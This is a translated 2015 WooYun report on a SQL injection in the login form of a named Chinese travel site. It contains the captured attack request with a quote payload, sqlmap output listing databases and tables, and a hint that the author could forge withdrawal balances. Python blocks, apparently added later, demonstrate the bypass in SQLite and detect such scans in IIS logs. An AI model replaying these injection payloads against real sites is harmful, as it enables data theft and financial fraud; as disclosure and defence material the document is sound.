Vulnerability summary (24 following)

Defect ID: wooyun-2015-0131590

Title: 逍遥行商旅网 has a SQL injection vulnerability (can expose 50 databases + several hundred thousand user records + allows withdrawal amounts to be forged at will)

Vendor: 逍遥行商旅网

Author: 路人甲

Submitted: 2015-08-05 15:12

Fix deadline: 2015-09-19 15:14

Disclosed: 2015-09-19 15:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:

Bookmarked by 4


Vulnerability details

Disclosure status:

2015-08-05: actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-09-19: vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

This domain name is pretty bold!

Detailed description:

Found this site while scanning one of Ctrip's class-C ranges. The login page has a POST injection. Captured the request and ran it: 50 databases, the current database holds several hundred thousand user records, and withdrawal amounts can be forged.

Proof of vulnerability:

POST /Account/Login?ReturnUrl=%2FHotelnew%2FOrder%3FcheckInDate%3D2015-08-05%26checkOutDate%3D2015-08-06%26hotelID%3DE00101025%26roomtypeId%3D1026%26rpId%3D1012861%26ppid%3D134128186 HTTP/1.1
Host: www.feijipiao.cn
Content-Length: 25
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.feijipiao.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.feijipiao.cn/Account/Login?ReturnUrl=%2fHotelnew%2fOrder%3fcheckInDate%3d2015-08-05%26checkOutDate%3d2015-08-06%26hotelID%3dE00101025%26roomtypeId%3d1026%26rpId%3d1012861%26ppid%3d134128186&checkInDate=2015-08-05&checkOutDate=2015-08-06&hotelID=E00101025&roomtypeId=1026&rpId=1012861&ppid=134128186
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=9340930048; pgv_si=s543827968; bdshare_firstime=1438672541258; travelCity=cityid=0101&cityname=%e5%8c%97%e4%ba%ac; QN163=0; 4000747888mid=987_24; 4000747888msg=%u60A8%u597D%uFF0C%u8BF7%u95EE%u6709%u4EC0%u4E48%u53EF%u4EE5%u5E2E%u5230%u60A8%uFF1F%u8BF7%u63A5%u53D7%u804A%u5929%u9080%u8BF7%u3002; 4000747888mh=1438672681002; 4000747888slid=slid_983_27%7C; 4000747888slid_983_27=1438672681019; his_hotel=[{"hotelName":"????o????é?????é??é???o?","hotelId":"E00101025","price":410}]; CNZZDATA1000181042=617491300-1438667942-%7C1438667942
ClientName=aaa%27&PWD=aaa
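The request above ends with `ClientName=aaa'&PWD=aaa`: a single quote in the username field makes the server answer HTTP 500, which is the error-based signal sqlmap then worked from (its output below counts those 500s). The Python below is added here as an illustration; it is not code from the report or from the site. It reproduces the mechanism against an in-memory SQLite table and shows the parameterized form that closes it. The table name `Client`, the `Balance` column and the sample rows are assumptions; only the `ClientName` and `PWD` field names come from the captured POST body. SQLite and SQL Server both treat `''` as an escaped quote inside a string literal, so the unterminated-quote parse error is the same in both.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the application's client table (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE Client (ClientID INTEGER PRIMARY KEY, "
        "ClientName TEXT, PWD TEXT, Balance REAL)"
    )
    db.executemany(
        "INSERT INTO Client (ClientName, PWD, Balance) VALUES (?, ?, ?)",
        [("alice", "s3cret", 120.0), ("bob", "hunter2", 0.0)],
    )
    return db


def login_vulnerable(db, client_name, pwd):
    """String-concatenated query: the shape that yields the behaviour in the report.
    A lone quote breaks the statement (-> HTTP 500); ' OR 1=1 -- bypasses the check."""
    sql = (
        "SELECT ClientID, ClientName FROM Client WHERE ClientName='"
        + client_name
        + "' AND PWD='"
        + pwd
        + "'"
    )
    return db.execute(sql).fetchall()


def login_fixed(db, client_name, pwd):
    """Parameterized query: user input never reaches the SQL parser as syntax.
    (Passwords are compared in clear here only to keep the injection fix isolated;
    real code stores and verifies a salted hash instead.)"""
    sql = "SELECT ClientID, ClientName FROM Client WHERE ClientName=? AND PWD=?"
    return db.execute(sql, (client_name, pwd)).fetchall()


def probe(db, login, client_name, pwd):
    """Run one login attempt and report ('ok', rows) or ('error', message),
    mirroring the 200-vs-500 distinction an attacker observes over HTTP."""
    try:
        return ("ok", login(db, client_name, pwd))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for name in ("aaa'", "' OR 1=1 --", "alice"):
        print("vulnerable", repr(name), probe(db, login_vulnerable, name, "aaa"))
        print("fixed     ", repr(name), probe(db, login_fixed, name, "aaa"))
```

Two caveats for whoever triages this. On SQL Server the same injection point also accepts stacked statements, which is what the author alludes to when talking about adding balance with a SQL statement; parameterization removes that too, but the database login the site uses should additionally be restricted. The 48-entry database list sqlmap prints below shows the login can see every database on the instance, not necessarily read them: SQL Server grants VIEW ANY DATABASE to public by default, so read access to the other databases would have to be checked per database before the "50 databases leaked" figure in the title is taken at face value.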

[Screenshot: captured request packet (搜狗截图15年08月04日1622_5.png)]

[15:36:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
[15:36:51] [INFO] fetching database names
[15:36:51] [WARNING] reflective value(s) found and filtering out
[15:36:51] [INFO] the SQL query used returns 48 entries
available databases [48]:
[*] CANFeiYouShangWu
[*] CANJinTian
[*] CANJTDZB
[*] CANMoLing
[*] CANSengLan
[*] CANTianTai
[*] CANTianYiLou
[*] CANTianYun
[*] CANXingTu
[*] CANXinZhuLiu
[*] CANYuLiang
[*] CANYunShangFei
[*] CSXChunShi
[*] CSXCuoFengCY
[*] CSXFuHang
[*] CSXJinFei
[*] CSXKaiWei
[*] CSXLeFei
[*] CSXLongXing
[*] CSXTianYuSW
[*] CSXTongYun
[*] CSXWoYaoFei
[*] CSXXingShaPiaoWu
[*] CSXXinJiYuan
[*] CSXYiTong
[*] CSXYuLiang
[*] CSXZeTuo
[*] DataService
[*] FJPDB
[*] HGHWanTu
[*] HGHZhuJiFeiKuai
[*] master
[*] model
[*] msdb
[*] NNGXinRui
[*] OADB
[*] PEK360ShangLv
[*] PEKBaiWei
[*] PEKFeiYingZhanChi
[*] PEKJieLan
[*] PEKJinLongShenShi
[*] PEKJunPeng
[*] PEKWanYou
[*] PEKYiChuXing
[*] PEKYiFeiChangXing
[*] SHAShunxingTianXia
[*] TAOPengFei
[*] tempdb
[15:36:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[15:36:52] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\output\www.feijipiao.cn'

50 databases... I was stunned.

Database: FJPDB
[264 tables]
+----------------------------------+
| APIManager |
| APIManagerLog |
| APIOperLog |
| Account |
| ActivityLottery |
| Agent |
| AirCo |
| AirPort |
| BAArea |
| BAChng |
| BADistance |
| BAPlaneInfo |
| BAPrice |
| BAPriceBak |
| BAPriceNO |
| BCInfo_Temp |
| BCScheduling_Temp |
| BCSwingCardTemp_Temp |
| BDBank |
| BDBankCreditCard |
| BDBankOffLine |
| BDDic |
| BDPayPlatParam |
| BOLog |
| BOPage |
| BORole |
| BOUser |
| BankStatement |
| CabinGW |
| Client |
| ClientB2B |
| ClientB2BAccount |
| ClientB2BAirCoAcct |
| ClientB2BBill |
| ClientB2BContact |
| ClientB2BLog |
| ClientB2BTranRec |
| ClientB2BUser |
| ClientB2BZChng |
| ClientCashLog |
| ClientCashTake |
| ClientFeedback |
| ClientJiFenLog |
| ClientLevel |
| ClientLoginLog |
| ClientPsgr |
| ClientRefund |
| CommonDiscount |
| CommonPassenger |
| Contract |
| Coupon |
| CouponType |
| Customer |
| FinMatch |
| FinMatchSwitch |
| FinSell |
| FinTradeDetail |
| FlightQuery |
| FlightQueryAndT |
| FlightQueryF |
| FlightQueryT |
| FlightTaxAirFree |
| FlightTemp |
| FriendLink |
| GiftSerial |
| GiftSerialChk |
| Help |
| HotelAddPriceDetail |
| HotelBrand |
| HotelCancelRule |
| HotelChangePrice |
| HotelCommissionRule |
| HotelCommissionRuleDetail |
| HotelDetail |
| HotelDetailNew |
| HotelGarantee |
| HotelImage |
| HotelImageNew |
| HotelInfo |
| HotelInfoNew |
| HotelInfoReplenish |
| HotelJLCity |
| HotelJLState |
| HotelLocation |
| HotelLocationNewID |
| HotelLog |
| HotelMail |
| HotelNear |
| HotelNearNew |
| HotelOnlinePayment |
| HotelOrder |
| HotelOrderCreditCard |
| HotelOrderGuest |
| HotelOrderProcessLog |
| HotelOrderRate |
| HotelPrePayBase |
| HotelPromotion |
| HotelQunar |
| HotelQunarCityInfo |
| HotelQunarOrder |
| HotelQunarRoom |
| HotelRateTypeInfo |
| HotelRelation |
| HotelRoom |
| HotelRoomNew |
| HotelRoomPriceDetail |
| HotelRoomPriceDetailH |
| HotelRoomPriceQueue |
| HotelRoomRate |
| HotelRoomRateNew |
| HotelSearchProcess |
| HotelSelfId |
| HotelUserComment |
| HotelUserCommentSummary |
| InsureWaitIssue |
| JPAirCoRebateRateSet |
| JPInsureProfit |
| MarketingLog |
| MarketingUser |
| MarketingUserDetail |
| News |
| NewsComment |
| NewsType |
| Notepad |
| Notes |
| NotesType |
| NotesViewer |
| OTA |
| OrderAir |
| OrderAirBuyerTTSTask |
| OrderAirCoTktInfoPN |
| OrderAirComment |
| OrderAirF |
| OrderAirF_V |
| OrderAirGJQL |
| OrderAirH |
| OrderAirIDX |
| OrderAirLog |
| OrderAirOld |
| OrderAirOutTktTaskDFT |
| OrderAirPriceChng |
| OrderAirT |
| OrderAirTAPPClient |
| OrderAirTBTktCallBack |
| OrderAirTChange |
| OrderAirTChng |
| OrderAirTRefund |
| OrderAirTRefundRule |
| OrderAirTTSNotify |
| OrderAirTWrong |
| OrderAirTimeLimit |
| OrderAirV |
| OrderList517 |
| OrderLowerCabin |
| OrderSameCabin |
| OrderTicketUseStatTask |
| Organization |
| PIDInfo |
| PIDInstructionHis |
| PIDUserHis |
| PassengerInfo |
| PayDetach |
| PayTask |
| PayTicketNoBack |
| PkgAssociate |
| PkgAttractions |
| PkgOrder |
| PkgPicture |
| PkgProductInfo |
| PkgScenicInfo |
| Policy |
| PolicyActivityGW |
| PolicyActivityGWLog |
| PolicyCheckPoint |
| PolicyCheckPointLog |
| PolicyDSV |
| PolicyLog |
| PolicyOperLog |
| Problem |
| ProblemReply |
| ProfitAdj |
| QTInfo |
| QTInfo_Bak |
| QtInfoHis |
| RTXNotify |
| ReceiptCost |
| ReceiptCostDetail |
| ReportTrend |
| ReportTrendData |
| SMSReceive |
| SMSSendWait |
| SMSSended |
| SMSTask |
| SMSTemplet |
| SMSTempletF |
| SYSIPAttack |
| SYSLog |
| SYSParam |
| SmsTaskResult |
| SmsTaskWait |
| SolarData |
| SpecialDiscount |
| SystemLog |
| TaoBaoAirLine |
| TaoBaoAirLog |
| TaoBaoAirPrice |
| TicketOrder |
| TicketPlatform |
| TicketProduct |
| TicketProductPrice_AI |
| TicketProduct_AI |
| TicketProduct_BL |
| TicketProduct_JU |
| TicketProduct_QN |
| TicketQunarOrder |
| TicketQunarOrderPay |
| TicketQunarOrderPerson |
| TicketRefund |
| TicketResource_BL |
| TktAirRec |
| TktAirRecPNRInfo |
| TrainAccount |
| TrainOrder |
| TrainOrderH |
| TrainOrderLog |
| TrainOrderPsgr |
| TrainOrderV |
| TrainSourceManage |
| TrainVerify |
| TrainVerifyH |
| TrainVerifyPsgr |
| TrainVerifyPsgrH |
| TrainVersionInfo |
| TravelAD |
| TravelActivityDate |
| TravelApiProcess |
| TravelBranch |
| TravelDates |
| TravelHotLocation |
| TravelHotelInfo |
| TravelLineLog |
| TravelNavigationBar |
| TravelNearCity |
| TravelOrderCreditCard |
| TravelOrderLog |
| TravelPromotion |
| TravelSearchKeyWord |
| TravelSeasonPopular |
| TravelTrafficInfo |
| TravelTui |
| TsqlLog |
| UserCollection |
| UserReviews |
| _FinTradeDetail20150313 |
| _HotelInfonewUpd0603 |
| _HuoChePiaoIDNo |
| _OrderAirT201501091140afterdate8 |
| _OrderAirTChng201501081625 |
| _OrderAirTChng20150121 |
| airport1 |
| pidtemp |
| trace_profiler |
| v_BCInfo |
| v_BCUserSet |
+----------------------------------+
[15:36:12] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 267 times
[15:36:12] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\output\www.feijipiao.cn'
[*] shutting down at 15:36:12
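From the defender's side the run above is loud: sqlmap itself reports 267 HTTP 500 responses while enumerating the 264 tables, all from one client against the same login path. The Python below is added here as an illustration, not part of the report. It parses IIS 7.5 W3C log lines (the stack sqlmap fingerprinted) and flags any client that produces a burst of 500s on `/Account/Login` inside a short window. The log lines are constructed for the example; IIS does not log POST bodies, so the rule keys on status code and rate rather than on the `aaa'` payload itself. Field names follow the default IIS W3C layout, and the window and threshold are assumptions to tune per site.

```python
from collections import defaultdict
from datetime import datetime, timedelta

HEADER = ("#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
          "cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken")


def make_sample_log():
    """Constructed log: two ordinary logins, one page view, and a 12-request burst of
    HTTP 500s from a single client against /Account/Login (the pattern sqlmap leaves)."""
    lines = [
        HEADER,
        "2015-08-04 07:20:01 10.0.0.5 POST /Account/Login - 80 - 198.51.100.20 Mozilla/5.0 302 0 0 15",
        "2015-08-04 07:21:40 10.0.0.5 POST /Account/Login - 80 - 198.51.100.21 Mozilla/5.0 200 0 0 12",
        "2015-08-04 07:36:51 10.0.0.5 GET /Hotelnew/Order checkInDate=2015-08-05 80 - 198.51.100.20 Mozilla/5.0 200 0 0 40",
    ]
    for sec in range(12):
        lines.append(
            f"2015-08-04 07:36:{sec:02d} 10.0.0.5 POST /Account/Login ReturnUrl=%2FHotelnew%2FOrder "
            "80 - 203.0.113.7 Mozilla/5.0+(Windows+NT+6.3;+WOW64) 500 0 0 31"
        )
    return "\n".join(lines)


def parse_iis(text):
    """Turn W3C log text into dicts keyed by the names in the #Fields directive."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed or truncated line; skip rather than misalign columns
        rows.append(dict(zip(fields, parts)))
    return rows


def find_injection_scans(rows, path="/Account/Login", window=timedelta(minutes=5), min_errors=10):
    """Return {client_ip: max number of 500s on `path` within any `window`} for clients
    that reach `min_errors`. A sliding window over sorted timestamps keeps it O(n) per IP."""
    by_ip = defaultdict(list)
    for r in rows:
        if r["cs-uri-stem"].lower() == path.lower() and r["sc-status"] == "500":
            by_ip[r["c-ip"]].append(datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S"))
    alerts = {}
    for ip, times in by_ip.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_errors:
            alerts[ip] = best
    return alerts


if __name__ == "__main__":
    for ip, count in find_injection_scans(parse_iis(make_sample_log())).items():
        print(f"possible SQL injection scan from {ip}: {count} HTTP 500s on /Account/Login")
```

A burst of 500s on a login handler is also worth alerting on by itself, since a login endpoint that throws server errors for ordinary input is the symptom of exactly this class of bug; pairing the rule with the application's own exception log (the `SYSIPAttack` and `SYSLog` tables above suggest the site kept one) gives the payload that the web log lacks.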

Contents of the current database; BOUser holds the user data.

[Screenshot: BOUser table (搜狗截图15年08月04日1624_6.png)]

Dumped a few users at random as proof.

[Screenshot: withdrawal page (体现.png)]

Here you can add a SQL statement to increase the balance amount, or go find a user who has a balance and then....

Fix suggestions:

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively declined.

Vulnerability Rank: 15 (WooYun rating)